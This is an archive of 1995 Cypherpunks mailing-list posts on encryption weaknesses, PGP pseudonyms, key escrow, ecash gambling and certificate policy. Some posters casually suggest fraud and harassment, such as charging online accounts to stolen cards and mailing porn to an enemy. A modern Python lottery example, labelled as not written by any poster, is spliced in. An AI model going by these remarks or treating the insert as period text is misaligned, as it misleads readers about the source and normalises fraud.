In-Reply-To: <199511291447.GAA19250@mail.eskimo.com>
Message-ID: <30BC95AB.211E@nexor.co.uk>

Joel McNamara wrote:
> Peter Gutmann has an interesting article in sci.crypt, demonstrating how
> weak Microsoft's encryption is with basic access control in Windows for
> Workgroups (I'm assuming Win95 uses the same algorithm). Essentially, he
> shows how a 32-bit key is created to be passed to RC4 for encrypting .PWL
> files. I think a t-shirt is definitely in order for this.

Further information on the method used by Windows NT (a challenge-response mechanism) can be found on the MSDN CD, or on the MS ftp site: PSS ID Number: Q102716. I'll mail the article to anyone that wants to see it (~11k).

- Andy

From jirib at sweeney.cs.monash.edu.au Thu Nov 30 04:05:57 1995
From: jirib at sweeney.cs.monash.edu.au (Jiri Baum)
Date: Thu, 30 Nov 1995 20:05:57 +0800
Subject: key for Alice as promised (not)
In-Reply-To:
Message-ID: <199511301156.WAA24082@sweeney.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello Jon Lasser and jimbell at pacifier.com (jim bell) and cypherpunks at toad.com

jim bell wrote:
> >On Tue, 28 Nov 1995, Adam Hupp wrote:
...

One reason why Alice might not want to use PGP would be that possession of the secret key would be ipso facto evidence that he is Alice.

...
> spoofed, HE WILL KNOW because he will see a message with his signature that
> HE KNOWS he didn't send. At that point, he will at least be able to reduce
> the number of spoofed messages to 1 before he alerts us that there is a
> problem. We won't necessarily know who to believe, of course, but we will
...
Who to believe: at that stage, Alice will simply cease to exist. The key will be revoked and Alice will be no more. A new Alice may or may not arise, but no-one will know if it's the same one.

If Alice is afraid of loss of identity (as if he had one now), he could have a permanent key at home (where he does his OTP work), and on his e-mail machine have only a temporary key. When the key on the public machine is compromised, it is revoked and a new one is issued. (The same can be done with real-name keys, BTW; viz my own key.)

...
> 3. Somebody found out how to break 1024-bit PGP keys easily. (Very
> unlikely, of course.)
...

In this case I think we are all stuffed.

Adiau'

Jiri
- --
If you want an answer, please mail to .
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBML2cAyxV6mvvBgf5AQFU7wP/ap/HA2SzMfRoM+5Rihw+j9RHC7aZNCtq
ZcUbXJRVXA2iDZfTE/vd5NgYDxEflyb9FwcGd8MZ8s0pxmee/iqEx3YXI0M2b7gL
HOex526hifweAQmaPoSQLWqiN4XVZ51XVBvKOJos/9eOX9FAZDRQZd6KFBaSqIcc
ZpzQ54NLm0g=
=BLPi
-----END PGP SIGNATURE-----

From futplex at pseudonym.com Thu Nov 30 05:02:47 1995
From: futplex at pseudonym.com (Futplex)
Date: Thu, 30 Nov 1995 21:02:47 +0800
Subject: The future will be easy to use
In-Reply-To: <199511300704.XAA01742@blob.best.net>
Message-ID: <199511300819.DAA10897@opine.cs.umass.edu>

Jon Lasser writes:
> However, if you have optional linking of ID and name, shippers will only
> ship to keys with such attributes. Because just ID and address, it could
> be a "hit and run" type attack shipped to a safe maildrop.

People who steal credit cards prefer to order goods to be delivered somewhere they can grab them. (Often this is just the front of the rightful owner's home, while Holly the Homeowner is off at work.)
But that's just another reason to cut down unauthorized credit card charges, not a reason to restrict what a rightful cardholder can do with the card. I _want_ to be able to have stuff delivered to arbitrary locations, and I _don't_ want to give that up just to make it tough on thieves.

James Donald writes:
> This argument makes no sense at all: I am going to attack my
> enemies by paying people to send books, computers, and stuff
> to them?

Ordering hardcore porno videos to be sent to, say, somewhere in Tennessee might work pretty well in our sadly repressed society.

-Futplex

From dlv at bwalk.dm.com Thu Nov 30 05:09:31 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 30 Nov 1995 21:09:31 +0800
Subject: The future will be easy to use
In-Reply-To: <199511300819.DAA10897@opine.cs.umass.edu>
Message-ID: <96oDFD11w165w@bwalk.dm.com>

futplex at pseudonym.com (Futplex) writes:
> People who steal credit cards prefer to order goods to be delivered somewhere
> they can grab them.

For most goods, yes. But one could use a stolen credit card, e.g., to set up an account on AOL / CompuServe and download tons of software, charging it to the card.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From jamesd at echeque.com Thu Nov 30 21:19:23 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 95 21:19:23 PST
Subject: The future will be easy to use
Message-ID: <199512010519.VAA12881@blob.best.net>

>On Tue, 28 Nov 1995, James A. Donald wrote:
>> This argument makes no sense at all: I am going to attack my
>> enemies by paying people to send books, computers, and stuff
>> to them?

At 12:39 PM 11/30/95 -0500, Jon Lasser wrote:
>No; you're going to steal from your enemies by having them ship things to
>you without payment.

Why would I bother to use encryption to encrypt someone else's credit card number?
This is like arguing that I could use a crypto book to hit someone over the head with in order to steal their wallet, or arguing that a firewalled computer can still be attacked with a sledge hammer.

Irrelevant.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From wfgodot at iquest.com Thu Nov 30 05:22:38 1995
From: wfgodot at iquest.com (Michael Pierson)
Date: Thu, 30 Nov 1995 21:22:38 +0800
Subject: Diskless "Eunuchs" Machines Likely to Fail
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article , Timothy C. May wrote:

>A couple of years ago "the computer for the rest of us" was said to be a
>pen-based Newton-type machine, now it is said to be a diskless,
>memory-limited "Eunuchs" machine.

Beyond the specifics of Oracle's naive vision, I think what is doomed (I hope) to fail is the obsolescent paradigm that it reflects. It seems that many corporate types are fixated on the idea of tractable and predictable consumers. The need to raise the population and broaden the demographic of potential customers for the coming Information SuperMarketway by minimizing the entry cost is obvious. The approach to understanding the actual dynamics of why people are and will increasingly come into this space and what they will want to do once they get there is deficient for many. Some are intimidated by the unpredictably evolving emergent properties of consumer (well, still mostly window shopper) behavior in this new territory, and are looking for the comforting familiarity that their marketing consultants and financial planners could provide them in the old brickspace way of doing business.
Others are puzzled, or are overtly threatened by the idea of potential consumers who are also content producers. I think that the limitations of interactive set-top boxes and lobotomized net terminals appeals to this mindset. There's less likelihood of troubling novel behavior and initiative. The consumer's options are constrained and thereby the details of marketing are more manageable. These prospective cyber-consumers who are increasingly in the frustrating habit of producing and sharing content amongst themselves (usually for free, no less!), thereby distracting each other from the content providers and virtual storefronts they should be flocking to, are a potent wild card in the game that many cannot deal with, and some wish they could deal out of the deck.

This nascent internet phenomenon is the economic aspect of the broader disintegration and decline of the means to control mass opinion and behavior that many in the current ruling class find threatening as well.

The corporations that can get a clue, and learn how to go with the flow of this changing environment, can still prosper. The dinosaurs who can't, or won't adapt, will free up valuable niches for the independent upstarts who not only can ride the waves of change, but who thrive on them and even strive to make them bigger.

Oracle's vision of the low-cost, diskless "Eunuchs" net station may materialize on the shelves of Walmart, and Circuit City, etc... But it will not take long for those who buy them to realize that they are in a subclass on the internet (That is, if they are really given the freedom to explore the net at large) and to feel frustrated with their limited options to create and express themselves. Those too dim-witted to notice or care might as well have remained as bovine Cable Shopping Network viewers ensconced in their TV room lounge chairs.
I do think that there is a substantial and viable market for entry level notebook form factor (running off a cheap wall socket DC converter with battery optional) 'Net' PC's well below $1000 in the not-too-distant future. Processor and hard drive costs are certainly dropping fast enough to make that a credible possibility. Display and memory costs remain the major obstacles, but I think workable compromises could be made. This could be a potent opportunity for somebody like the AIM alliance to make an end run around the Intel-Microsoft axis, if they were able to take the long view and act decisively (yeah...fantasy).

Start with something like the low end PPC602, develop a highly integrated chip set for video, drive, RAM controller, modem, etc... Surface mount on board with RJ-11, USB and external monitor connector, include as much HD as will fit within the target production cost. Throw in a SIMM or DIMM slot for the option of supplementing the minimum included memory later. Provide greyscale LCD standard with color dual-scan option. Come up with a _TIGHT_ fully native code subset of MacOS. Add a compact application suite including internet connectivity plus simple PIM and WP functionality. Provide a coupon for a subsidiary online service cum internet gateway, ala MSN. Sell the machine at a minimal margin over cost, and view the entire venture as a way to gain broad market presence. Market presence must have substantial worth, because Netscape's stock is surely not being valued on its price-earnings ratio.

>The only relevance of this whole topic to Cypherpunks is....is....minimal.

Well, perhaps. I suppose I'm risking the chastisement of Cypherpunk purists with my follow-up on this non-crypto topic.
But it seems to me that the broadest shared sentiment among the people on this list is a passionate interest in defending and expanding personal liberty, sovereignty and privacy in cyberspace, and the realization that the unencumbered use of strong cryptography is indispensable to those goals. If it wasn't for this nexus, there would be no cypherpunks, and the esoteric technicalities of modern cryptography would be of interest to few besides professional security consultants/programmers and obscure academic types. It's useful to explore the wider context of relevance occasionally, if only to gain perspective (As long as we can avoid another Ayn Rand or Noam Chomsky pissing match...).

ObCrypto: People limited solely to diskless terminals for their internet access will be second class netizens. They would be less likely to really appreciate and comprehend the issues surrounding online privacy and cryptography, and they would be less able to take action on these issues even if they wanted to.

- -Michael

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML1jZtGJlWF+GPx9AQGhcAP/WL7+Unoxn51A2QlCRRSsS8wXdi7/UuFz
3JSC49VJLU7KFWEqTwhIV657JubChxUjN1mxymSDbaoROWcyPn8AlEVuLD2Y/NcW
SYYCAy1nJWh8H2yFAz1aW2XToG09V/XrO/hhcN8WyM8agJoYcVxdCmRuC/6bhPnG
qBcMn7amGnE=
=/Qbk
-----END PGP SIGNATURE-----

From jya at pipeline.com Thu Nov 30 05:37:42 1995
From: jya at pipeline.com (John Young)
Date: Thu, 30 Nov 1995 21:37:42 +0800
Subject: RED_sky
Message-ID: <199511301327.IAA13236@pipe1.nyc.pipeline.com>

11-30-95. W$Jiver, Page One lead:

"New Satellite Imaging Could Soon Transform The Face of the Earth. Big Worries About Security."

Next time you gaze into the heavens, practice your smile. The ventures being backed by companies such as Lockheed Martin Corp., the E-Systems Corp. and Orbital Sciences Corp. will offer days-old digital images of unprecedented clarity.
These corporate systems worry some scientists and federal policy makers concerned about privacy invasion and a free-for-all expansion of espionage. One notes that Lockheed Martin and E-Systems already have such systems in space. "They do this for the intelligence agencies. The very system that they're putting up there is a classified system now."

A Senate staffer says that as budgets are chopped for the NRO and military satellite operators, the commercial systems will offer lower-cost images for government needs, preserve jobs and know-how in a vital area of technology and ensure U.S. leadership in the imaging industry.

Nations such as France, Russia, South Africa, India and Israel are contemplating expanded use of their high-resolution systems.

RED_sky (16 kb)

From jamesd at echeque.com Thu Nov 30 21:49:11 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 95 21:49:11 PST
Subject: Netscape, Corporations, and GAK Support
Message-ID: <199512010549.VAA27849@blob.best.net>

At 03:08 PM 11/30/95 -0500, hallam at w3.org wrote:
>
> Folks, lay off Netscape on this one. [...]
>
> It is the idea that individuals be forced to
> use it for private conversations that is the bad idea.

Jim Clark advocated Government Access to Keys: GAK. He did not advocate voluntary escrow -- very few people object to voluntary escrow.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From jamesd at echeque.com Thu Nov 30 21:49:15 1995
From: jamesd at echeque.com (James A.
Donald)
Date: Thu, 30 Nov 95 21:49:15 PST
Subject: Getting a copy of the Jim Clark speech
Message-ID: <199512010549.VAA27874@blob.best.net>

At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
> I'm working on an "obnoxify" program to convert
> normal html documents into documents that look
> normal to non-netscape browsers, but are too painful to
> read with netscape (, , etc.).
> I think tomorrow evening would be a good time to decide
> whether or not to distribute it.

Is there any way one could set up a dirty pictures web page in such a fashion that it would be difficult, painful, and impractical to get at the pictures through that page with a netscape browser?

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From holovacs at styx.ios.com Thu Nov 30 05:52:39 1995
From: holovacs at styx.ios.com (Jay Holovacs)
Date: Thu, 30 Nov 1995 21:52:39 +0800
Subject: Netscape gives in to key escrow
In-Reply-To:
Message-ID:

On Thu, 30 Nov 1995, Timothy C. May wrote:
>
> Can Netscape continue to prosper? This latest issue won't kill it,

I suspect this will unfortunately help. Stockholders are interested in profits, not principles. Co-oping with the feds will help Netscape get to the commercial market sooner, and most customers, sadly don't give a damn about privacy (or don't understand).

Jay Holovacs
PGP Key fingerprint = AC 29 C8 7A E4 2D 07 27 AE CA 99 4A F6 59 87 90
>

From sameer at c2.org Thu Nov 30 21:55:38 1995
From: sameer at c2.org (sameer)
Date: Thu, 30 Nov 95 21:55:38 PST
Subject: Netscape 2.0b2 allows for invasion of privacy (fwd)
In-Reply-To:
Message-ID: <199512010549.VAA18386@infinity.c2.org>

I knew livescript was nasty...
>
>
> Talking of Netscape - this posting prompted me to forward it given the
> security and privacy implications inherent in the problem.
>

--
sameer                                    Voice: 510-601-9777
Community ConneXion                       FAX: 510-601-9734
The Internet Privacy Provider             Dialin: 510-658-6376
http://www.c2.org/ (or login as "guest")  sameer at c2.org

From OpsAn at gnn.com Thu Nov 30 22:12:51 1995
From: OpsAn at gnn.com (Michael Coates)
Date: Thu, 30 Nov 95 22:12:51 PST
Subject: AUTHOR A VIRUS, GO TO JAIL
Message-ID: <199512010612.BAA13976@mail-e1a.gnn.com>

Found this interesting too. US Position?

AUTHOR A VIRUS, GO TO JAIL
A computer cracker last week became the first virus writer sentenced to a jail term under Great Britain's Computer Misuse Act. The 26-year-old perpetrator was sentenced to 18 months in jail after pleading guilty to 11 charges connected with placing virus-infected programs on computer bulletin boards. (Investor's Business Daily 29 Nov 95 A6)

From an366601 at anon.penet.fi Thu Nov 30 06:23:45 1995
From: an366601 at anon.penet.fi (** CRAM **)
Date: Thu, 30 Nov 1995 22:23:45 +0800
Subject: call forwarding trick in Las Vegas
Message-ID: <9511301409.AA17120@anon.penet.fi>

From: an453380 at anon.penet.fi

Your cybercrime task forces and exotic examples sound very intriguing, however, here in Las Vegas, Nevada we have a situation that is exotic but not quite in the same way. An "outcall" business has seemingly placed the telephone numbers of the major hotels into a Database along with the phone numbers of the local legal "outcall" services. When a "guest" from a hotel calls to have an exotic dancer entertain him in his hotel room, his call is "call forwarded" from the service to which he called to allegedly "S. E." and "R. S.". The "call forwarding" process was accomplished by a Select Call Forwarding maneuver from "off premises" and was not authorized by the service which was "by-passed".
It seems no one much cares, (except the services from which the business
was stolen), so this character is stealing to the tune of approximately
$200,000.00 per week. How long will it be until he taps into the banks,
etc? Does he pay taxes on his "full income"? How can this maneuver be
cancelled by the owners of the businesses from which are being stolen?
This guy is so brazen/stupid, he brags about "his accomplishment".

Any input would be much appreciated.

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to abuse at anon.penet.fi
For information (incl. non-anon reply) write to help at anon.penet.fi
If you have any problems, address them to admin at anon.penet.fi

From s1113645 at tesla.cc.uottawa.ca Thu Nov 30 06:40:49 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 30 Nov 1995 22:40:49 +0800
Subject: Credit card theft Re: The future will be easy to use
In-Reply-To: <96oDFD11w165w@bwalk.dm.com>
Message-ID:

On Thu, 30 Nov 1995, Dr. Dimitri Vulis wrote:

> futplex at pseudonym.com (Futplex) writes:
> > People who steal credit cards prefer to order goods to be delivered somewhere
> > they can grab them.
>
> For most goods, yes. But one could use a stolen credit card, e.g., to set
> up an account on AOL / CompuServe and download tons of software, charging
> it to the card.
>

Or c2.org, which might then make things interesting if the theft is detected.
(in a very perverse, and tooth-gnashingly aggravating way, of course).
Would Sameer cooperate with the LEAs to catch "an anonymous suspect using
his service"?

What if it's an ecash password getting stolen? Who's liable? (lemme guess,
your money's gone, tough luck!) What if you're just a dumb gullible computer
newbie who trusts ecash for its vaunted security? "But how was I supposed
to know that if I let someone surf my shoulder, I'd lose my bank account!?"
I'd say buyer beware! but he'd sue and the public will want a law ("Damn it, consumers have to be PROTECTED!"). Credit only has $50 worth of risk, most people are more interested in keeping their $ than their privacy. Just look at the number of them who enter contests. Disclaimer: I don't have a marktwain account at the moment, so I can't say a thing about the security of the system. I wish them the absolute best of luck. From rah at shipwright.com Thu Nov 30 06:41:40 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 30 Nov 1995 22:41:40 +0800 Subject: ecash lottery (Was: ecash casino) Message-ID: At 5:27 AM 11/30/95, Timothy C. May wrote: >My intuition (hand-waving) is that an anonymous lottery is possible, but I >haven't looked at the details. Certainly multiple trusted holders of keys >(escrow agents) would help make the lottery fair. Maybe bit commitment >would help (each player buys the right to play, then "commits" his number. >A public reading of the winning number occurs, and the winner can reveal >his winning number (anonymously if he wishes, providing he had registered >his hash....). My bet it would work a lot like anonymous voting schemes would, though I don't know how. It just feels like the same kind of thing... Cheers, Bob ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From nobody at REPLAY.COM Thu Nov 30 06:58:26 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 30 Nov 1995 22:58:26 +0800 Subject: Quit it! Message-ID: <199511300520.GAA07040@utopia.hacktic.nl> I am me! No I am not! Yes I am! No I'm not! Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. 
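The commit-then-reveal lottery sketched in the "ecash lottery" message above (each player commits a number, the winning number is read publicly, the winner reveals), written out as an added Python example that is not part of any poster's message. SHA-256, the 16-byte nonce, the 1..1000 ticket space, the agent-seed draw and all names are assumptions of this sketch.

```python
import hashlib
import secrets

NUMBERS = range(1, 1001)   # assumed ticket space, not from the thread
NONCE_LEN = 16             # assumed nonce size in bytes


def commit(number, nonce):
    """Ticket commitment: SHA-256(nonce || number). The nonce hides the number."""
    if number not in NUMBERS or len(nonce) != NONCE_LEN:
        raise ValueError("bad number or nonce length")
    return hashlib.sha256(nonce + number.to_bytes(2, "big")).hexdigest()


def unsalted_commit(number):
    """Commitment WITHOUT a nonce, shown only to explain why one is needed."""
    return hashlib.sha256(number.to_bytes(2, "big")).hexdigest()


def recover_unsalted(digest):
    """With only 1000 possible numbers, a bare hash is opened by enumeration."""
    for n in NUMBERS:
        if unsalted_commit(n) == digest:
            return n
    return None


def seed_commit(seed):
    """Each trusted agent publishes this before ticket sales open."""
    return hashlib.sha256(b"seed" + seed).hexdigest()


class Lottery:
    """Public bulletin board: agent seed commitments plus ticket commitments."""

    def __init__(self, agent_seed_commitments):
        self.agent_commitments = list(agent_seed_commitments)
        self.tickets = set()
        self.winning = None

    def register(self, commitment):
        if self.winning is not None:
            raise RuntimeError("registration closed: number already drawn")
        if commitment in self.tickets:
            # Rejecting duplicates stops a player copying someone's ticket.
            raise ValueError("duplicate commitment")
        self.tickets.add(commitment)

    def draw(self, revealed_seeds):
        """Agents reveal seeds; the winning number is derived from all of them."""
        if [seed_commit(s) for s in revealed_seeds] != self.agent_commitments:
            raise ValueError("an agent's seed does not match its commitment")
        digest = hashlib.sha256(b"".join(revealed_seeds)).digest()
        self.winning = int.from_bytes(digest, "big") % len(NUMBERS) + 1
        return self.winning

    def claim(self, number, nonce):
        """Anyone can check a claim: only (number, nonce) is revealed, no name."""
        if self.winning is None or number != self.winning:
            return False
        return commit(number, nonce) in self.tickets


if __name__ == "__main__":
    # Constructed demo: two agents, two players, random seeds and nonces.
    seeds = [secrets.token_bytes(16) for _ in range(2)]
    lottery = Lottery([seed_commit(s) for s in seeds])
    tickets = {name: (secrets.choice(NUMBERS), secrets.token_bytes(NONCE_LEN))
               for name in ("player-1", "player-2")}
    for number, nonce in tickets.values():
        lottery.register(commit(number, nonce))
    print("winning number:", lottery.draw(seeds))
    for name, (number, nonce) in tickets.items():
        print(name, "picked", number, "wins:", lottery.claim(number, nonce))
    print("unsalted hash of 417 opens to:", recover_unsalted(unsalted_commit(417)))
```

A claim made after the draw by someone who never registered fails because no matching commitment is on the board; the draw is only as fair as the agents, since the last agent to reveal a seed can still refuse to reveal.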
From rsalz at osf.org Thu Nov 30 06:59:19 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 30 Nov 1995 22:59:19 +0800 Subject: SKIP, NFS, SSL, etc. Message-ID: <9511300443.AA18343@sulphur.osf.org> NFS is not a valid example of a one-vendor internetworking protocol. In the early days of NFS Sun worked amazingly hard to get all the major Unix players to support it. They all but lent out engineering staff; they hosted several 'connectathons', where everyone tested interoperability, made the license minimal cost (if not free), etc. And, of course, there was nothing competing. /r$ From thad at hammerhead.com Thu Nov 30 07:01:10 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Thu, 30 Nov 1995 23:01:10 +0800 Subject: Internet gambling Message-ID: <199511300541.VAA04276@hammerhead.com> My favorite numbers game is "fixed". Choose a number from 1 to 1000. The least chosen number is the winner, and it pays off 1000:1. This least chosen number would have to be published in some non-repudiatable way, but that's not too hard. The fun thing is that you get to play with the minds of all the other players...when would be the first time that the same number was the winner two days in a row? Or how many times with 666 be the winning number? Or whatever. Bet all numbers, and it's a wash. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-2244 From s1113645 at tesla.cc.uottawa.ca Thu Nov 30 07:03:33 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Thu, 30 Nov 1995 23:03:33 +0800 Subject: ecash lottery (Was: ecash casino) In-Reply-To: <199511300250.SAA07657@infinity.c2.org> Message-ID: Deja vu? On Wed, 29 Nov 1995, sameer wrote: > I think it would be easier if the lottery owner was just in a > safe jurisdiction. Then he wouldn't have to worry about the legality > of it, and not worry about his anonymity. Gambling-safe jurisdictions > *do* exist. 
Wasn't www.casino.org a participant in the ecash trial run? I remember them
having a highly entertaining disclaimer. They're somewhere in the Caribbean,
I think.

Supposedly (so said the cbc news last year) some gent here in Ontario
(where non-licensed gambling is of course illegal--the gov likes its monopoly)
set up the domain and the webpage and sold space on the "Virtual Strip" to
interested offshore governments. Since the actual casino sites aren't in
Canada (and probably offshore gov run) it is legal for the operators.
It is illegal for us North Americans to use though.

I just checked the site and saw quite a few casino operations on the strip.
I didn't notice the ecash logo this time around (I'm doing this off lynx,
it might only be shown in the graphical version).

> There lies a problem if *playing* a game is illegal in the US,

Which is what the casino.org page says.

> which I believe it may be. If the winners can be revealed by
> bank/lottery collusion, then in order to protect the winners the
> lottery can't collude with the bank. This may not be a problem,
> because the lottery isn't subject to US law, so there would be no way
> to force the lottery to collude with the bank to reveal the
> identities of the winners.

And no economic incentive for the lottery.

What are the regulatory hassles of setting up a gambling operation in one
of the US states where it's legal (ie Nevada) ? I take it it would still be
illegal for someone outside the state to gamble using the service.

Isn't there also some Scandinavian bank that's handling ecash?
It might be hard to explain to US tax authorities how large amounts
of anon currency are ending up in one's marktwain account.

In that case it might be interesting for someone to setup an anon service
provider along the lines of c2.org which would allow users to run java
scripts, no-questions asked (presuming this is a legal gambling jurisdiction).
Java-based casinos, anyone?
(or just normal unix c progs, given shell access) Of course life will be much nicer when Chaum sheds his (*ahem*) ethics and starts licensing to offshore banks. (I take it Scandinavian taxes are far worse than American ones. I would think they'd be less drug-money-laundering paranoid than the US however. Makes you wonder how much attention the Fincen boys are giving marktwain at the moment). From fletch at ain.bls.com Thu Nov 30 07:28:42 1995 From: fletch at ain.bls.com (Mike Fletcher) Date: Thu, 30 Nov 1995 23:28:42 +0800 Subject: VisaCash security. In-Reply-To: Message-ID: <9511301505.AA04420@outland> I think the Visa stuff is basically stored value and rechargeable smart cards, not really ecash type money. Supposedly you'll be able to get a card with $10 or $20 on it and all the vending machines and phones around the Olympic venues will be set up to take the cards. So to answer your questions, no it's not really digital cash (like ecash); and yes I think it's probably traceable to some extent (unless you buy stored value cards w/paper cash). First Union, the bank selling the cards, has a page on them: http://www.firstunion.com/visacash/ Low on the technical info, but they give an address to mail questions to. --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From perry at piermont.com Thu Nov 30 07:43:58 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 30 Nov 1995 23:43:58 +0800 Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use ) In-Reply-To: <01BABEAC.2E90BDC0@ploshin.tiac.net> Message-ID: <199511301513.KAA05983@jekyll.piermont.com> Pete Loshin writes: > I was simply observing that Perry's comment: > > "...an internetworking protocol [e.g. SKIP] used by only > one vendor gets nowhere." 
> > is not necessarily true, and pointed to SSL and NFS as > counter-examples. I disagree. First of all, NFS was not competing with other widely available standards. Second of all, other vendors are committed to developing the other standard. What good will it be to run SKIP when your Cisco router wants to talk to you with something else? Perry From perry at piermont.com Thu Nov 30 07:53:32 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 30 Nov 1995 23:53:32 +0800 Subject: Your faith is PGP is charming and quaint, but wrong In-Reply-To: <199511300446.UAA19851@infinity.c2.org> Message-ID: <199511301515.KAA05995@jekyll.piermont.com> Hroller Anonymous Remailer writes: > > All of these articles from people claiming to be me! > > I repeat, for the slow learners, that I consider PGP to be > untrustworthy, at least on my machines. I don't want those Mounties > to do to me what they did to Mulroney en passant. How do we know that you are you? We have no evidence. Perry From cme at TIS.COM Thu Nov 30 07:55:30 1995 From: cme at TIS.COM (Carl Ellison) Date: Thu, 30 Nov 1995 23:55:30 +0800 Subject: The future will be easy to use In-Reply-To: <199511292049.MAA01411@comsec.com> Message-ID: <9511301511.AA27694@tis.com> -----BEGIN PGP SIGNED MESSAGE----- >From: Rich Salz >Date: Wed, 29 Nov 1995 08:54:33 -0500 >Bingo! This is one of the hard parts of certificate authorities; just >what are you attesting to? The American Bar Association has a big document >for public review that addresses what this might mean; there are a couple >of RFC's that specify CA policies (one from COST in Sweden, I think), and >RSA and/or Verisign will give you their policy in hardcopy. > >In x.509v3 certificates, there is an extensible field where the key-signer >can put arbitrary data. The intent is apparently that you put the ISO >object-ID (you know, those funny 1.3.2.11.... numbers) of the policy >document. Ah, yes. Here's another example of the problem with ASN.1. 
That field could equivalently be just a URL for the policy document (or, if short enough, the policy itself). However, ASN.1 seduced folks into indirecting this through some object ID -- bringing all these documents into the one master hierarchy of things in the world. Some people just like hierarchies, I guess. :) >There is, of course, no way to interpret the semantics of this electronically. Of course not. In the end, a human needs to make the decision based on ASCII text. >It will be interesting to see how various companies address this issue, >for example as they start to support arbitrary CA's in browsers or servers >while doing commerce over the web. Yup. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme | |Trusted Information Systems, Inc. http://www.tis.com/ | |3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2| |Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 | +--------------------------------------------------------------------------+ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBML3JY1QXJENzYr45AQHWIwP/VzoZuonIoMbIYHaA+noZpwnmNnxXc+jx elJNQkHglyE7U1pBfC90s8IewujeG5T97v5g5e9bAXi/gysIPoguAXYSdIufvjz+ +WpCDrxn4UlfRzfOrTOgpZ1KQwPUllywOo1Yehd2h35ctJ8P7sa27mS/AEyET85E rUvKlVpN/04= =EhTO -----END PGP SIGNATURE----- From adam at lighthouse.homeport.org Thu Nov 30 08:09:03 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Fri, 1 Dec 1995 00:09:03 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <199511300807.DAA12251@opine.cs.umass.edu> Message-ID: <199511301533.KAA17468@homeport.org> | > http://www.cnet.com/Central/News/govt.html | | To secure Net communications, the government will need to have access to | private data exchanges using what is known as a key escrow security system, | said Clark. 
He added that an invincible security system for the Net is
| possible, but such a system won't be built unless the government
| has a stake in it. "That's where key escrow comes in," said Clark.

(Assuming this means Netscape intends to build-in key escrow, not
lobby for it...)

How does Netscape intend to address the liability issues if
the key database is stolen and their *voluntary* actions lead to my
private communications being exposed?

Adam

(Jeff, if you could pass this on to the powers that escrow,
I'd appreciate it. I know you're here on behalf of you, but...)

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From nobody at flame.alias.net Thu Nov 30 08:11:43 1995
From: nobody at flame.alias.net (Anonymous)
Date: Fri, 1 Dec 1995 00:11:43 +0800
Subject: e-cash gambling
Message-ID: <199511301536.QAA25670@utopia.hacktic.nl>

Sameer, Ian, and then Tim wrote:

>> Any enterprising cypherpunks in gambling-friendly
>>jurisdictions interested? I figure it would make ecash take off.. and
>>you'd get rich.
>>
>Does anyone know what jurisdictions allow lotteries/gambling?
>
>Here's an off-the-cuff idea:
>
>[Disclaimer: The following post is a gedanken experiment. It should not
>be interpreted as condoning or encouraging anyone to break any
>laws, no matter how stupid the laws are.]
>
>Personally, I have long had great _hopes_ for using crypto for
>non-sanctioned gambling, but I'm pretty skeptical that many people will do
>it. For one thing, anyone knowledgeable enough to be comfortable with the
>cryptography knows that gambling when a house cut exists is a lose. (And
>gambling with no house cut is, at best, a wash.)

And then Allen wrote:

>How about gambling on something other than random numbers? Idea Futures
>are one instance, as is sports gambling for those interested in that sort of
>thing.

